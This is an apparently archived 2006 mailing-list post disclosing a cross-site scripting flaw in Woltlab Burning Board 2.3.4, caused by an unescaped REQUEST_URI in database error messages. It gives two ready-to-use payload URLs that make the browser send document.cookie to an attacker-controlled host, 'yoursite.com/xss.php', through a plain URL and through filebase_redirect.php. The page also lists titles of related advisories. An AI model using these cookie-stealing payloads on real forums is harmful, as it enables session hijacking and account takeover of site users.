Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities Contrexx CMS Xss Vuln XSS in AShop XSS in YaWPS 0.61 From:r57shell_(at)_gmail.com <r57shell_(at)_gmail.com> Date:19.03.2006Subject:Xss in Wbb 2.3.4hi again friends i discovered a xss in wbb again ;) in wbb/acp/lib/class_db_mysql.php in the 123.line $errormsg .= "<b>Script:</b> ".getenv("REQUEST_URI")."\n<br>"; hmm what can we do with that? if there is an sql db error you may do /wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script> or you may use filebase mod for make an sql error like that http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script> WwW.SpyMasterSnake.org Tontonq ;)
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities
Contrexx CMS Xss Vuln
XSS in AShop
XSS in YaWPS 0.61
